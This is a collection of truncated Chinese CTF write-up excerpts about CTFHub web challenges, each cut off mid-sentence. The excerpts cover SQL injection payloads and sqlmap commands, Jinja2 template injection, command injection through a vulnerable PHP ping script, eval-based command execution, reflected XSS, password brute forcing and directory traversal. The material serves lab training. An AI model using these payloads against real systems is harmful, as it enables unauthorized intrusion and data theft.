环境:https://www.ctfhub.com/#/challenge 打开题目可以看到源码: 阅读源码发现过滤掉了f l a g . p h / ; " ' ` | [ ] _ =这些字符,并且还有一些黑名单函数.这让我联想到了P神的一篇文章无数字.字母构造webshell (https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html) 测试发现可以使用: 下面就是要通过该方法构造一些黑名单之

一 [WesternCTF2018]shrine 没什么好说的,SSTI模版注入类问题,过滤了()但是我们不慌.开始注入,{{29*3}}测试通过. 发现是jinjia2的模版注入.关键点在于没有(),并且还要获取config文件,就可以获取到flag. 总结几种常用的读取config语句 1.{{config}} 2.{{self.__dict__}} 如果config和self和()都不能使用,就必须找到config的上层current_app 1.url_for.__globals__['

今天在ctfhub整理了几个sql注入的解题过程,还算是比较详细的. 知识点都是比较常见的:每个题大致涉及的知识点用一张表格解释 !注:下方的 information_schema.xxxxxxxxxxxxxx皆表示 information_schema库下的表 如:schemata.tables等,不作特殊说明的都指information库下的数据表 还有此处的题是ctfhub整合好的,所以所有的数据库和表包括字段名都一样,不要偷懒. 关键字/语句/函数 解释 union select 联合查

在一个大佬的突然丢了个题过来,于是去玩了玩rce的两道题 大佬的博客跳转链接在此->>>大佬召唤机 叫 命令注入 一上来就是源码出现,上面有个ping的地方 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $cmd = "ping -c 4 {$_GET['ip']}"; exec($cmd, $res); } ?> <!DOCTYPE html> <

Web HTTP协议 请求方式

payload   1 Union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x; payload拆分讲解  1 count():count()函数返回匹配指定条件的行数.count(*)函数返回表中的记录数 2 floor():floor:函数是用来向下取整呢个的,相当于去掉小数部分 3 rand():rand()是随机取(0,1)中的一个数,但是

整数型注入 手工注入 1.查看是否存在sql注入,及sql注入类型 2.确定列数 3.确定注入点,以及数据库版本,数据库名称 4.查表名 5.查字段名以及flag值 获得flag值 sqlmap做法 查库 sqlmap.py -u http://challenge-f51ffc5c81cd4553.sandbox.ctfhub.com:10080/?id=1 --dbs 查表 sqlmap.py -u http://challenge-f51ffc5c81cd4553.sandbox.ctfhu

Web题下的SQL注入 1,整数型注入 使用burpsuite,?id=1%20and%201=1 id=1的数据依旧出现,证明存在整数型注入 常规做法,查看字段数,回显位置 ?id=1%20order%20by%202 字段数为2 ?id=1%20and%201=2%20union%20select%201,2 1,2位置都回显,查表名 ?id=1%20and%201=2%20union%20select%20group_concat(table_name),2%20from%20inform

今天CTFHub正式上线了,https://www.ctfhub.com/#/index,之前有看到这个平台,不过没在上面做题,技能树还是很新颖的,不足的是有的方向的题目还没有题目,CTF比赛时间显示也挺好的,这样就不用担心错过比赛了. 先做签到题,访问博客就可以拿到. Web前置技能, 可以看到大部分题目都还没有补充完成. HTTP协议第一题:请求方式 一般来说我们比较常用的是GET和POST方法 开启题目 可以看到是需要我们使用CTFHUB方法访问该网址,burpsuite里面修改请求方法好

数据库类流量: MySQL流量: 1.下载附件,是一个.pcap文件,用wireshark分析, 2.搜索ctfhub字段,即可得到flag, flag: ctfhub{mysql_is_S0_E4sy} Redis流量: 1.下载附件,是一个.pcap文件,用wireshark分析, 2.搜索ctfhub字段,发现flag只有一部分, 3.接着第66个字符接着往后找, 4.在第70个找到后半部分flag, flag: ctfhub{6051d6123de43dfad7609804925c012

命令注入: 1.进入页面,测试127.0.0.1, 关键代码: <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) {// 传入ip, $cmd = "ping -c 4 {$_GET['ip']}";// 运行命令,可以拼接 exec($cmd, $res);// 执行cmd,把结果输出到res } if ($res) { print_r($res);// 打印结果 } show_source(_

eval执行: 1.进入网页,显示源码, <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 2.输入命令,发现该文件并不是想要的, cmd=system("ls"); 3.继续查看目录命令, cmd=system("ls /"); 4.查看,得到flag, cmd=system(&qu

最近又是每天忙到裂开,,,淦 xss: 反射型: 1.第一个输入框与下面Hello后的内容相同,猜测可以通过该输入,改变页面内容. 测试语句: <script>alert(1)</script> 2.测试第一步中的语句,出现如下回显, 3.根据url栏可知通过_GET传入参数, 4.经过测试,第二个输入框输入URL时,返回SUCCESS,猜测在后台进行访问, 5.使用XSS测试平台,创建项目,将网址name=后改为平台提供的代码后,send,在项目内容中接收flag, 6.得到fl

密码口令: 弱口令: 1.随意输入账号密码,抓包, 2.右击,"Send to Intruder",打开选项卡Intruder,点击position,椭圆框处软件已经自动为我们把要爆破的字段标注了出来.设置payload,加载自己的密码字典(包含一些常见的密码),开始爆破. 默认口令: 1. 根据题目提示,去搜索北京亿中邮信息技术有限公司邮件网关的默认口令, 2.尝试如下账号密码, 账号:eyougw 密码:admin@(eyou) flag: ctfhub{de322d85c14bf

目录遍历: 法一: 依次查看目录即可: 法二: 利用脚本:  #!/usr/bin/python3  # -*- coding: utf-8 -*-  # --author:valecalida--  import urllib.request  num_list = [i+1 for i in range(4)]  ​  for i in num_list:      try:          res = urllib.request.urlopen("http://challenge-c1

请求方法: 1.进入页面,提示:HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源. 2.当前http的请求方式是get请求,当你使用CTFHUB为请求方式时,你将获得flag(HTTP Method 是可以自定义的,并且区分大小写) 3.方法:(1)burp抓包,修改HTTP Method为CTFHUB,发包,返回flag信息(2)用curl命令行工具,执行命令,在返回的源代码里可以找到flag信息 curl -v -X CTFHUB url地址

手注 查询数据库 -1/**/union/**/select/**/database(),2 查询表名 -1/**/union/**/select/**/group_concat(table_name),2/**/from/**/information_schema.tables/**/where/**/table_schema='sqli' 查询字段名 -1/**/union/**/select/**/group_concat(column_name),2/**/from/**/informa

手注 查询数据库名 查询数据表名 查询字段名 查询字段信息 脚本(from 阿狸) #! /usr/bin/env python # _*_ coding:utf-8 _*_ url = "http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/" import requests def postPL(pl = '', mask=['</code></br>ID: 1</br>','<

手注 打开靶机 查看页面信息 抓取数据包 根据提示注入点在User-Agent文件头中 开始尝试注入 成功查到数据库名 查询数据表名 查询字段名 查询字段信息 成功拿到flag 盲注 测试是否存在时间盲注 测试成功,开始盲注 查询数据库名 查询数据表名 查询字段名 查询字段信息 成功拿到flag 附上脚本 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests import sys import time session=req

手注 打开靶机 查看页面信息 查找cookie 测试是否为cookie注入 抓包 尝试注入 成功查询到数据库名 查询表名 查询字段名 查询字段信息 成功拿到flag sqlmap 查询数据库名 python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 --dbs 查询数据表名 python2 sqlmap.p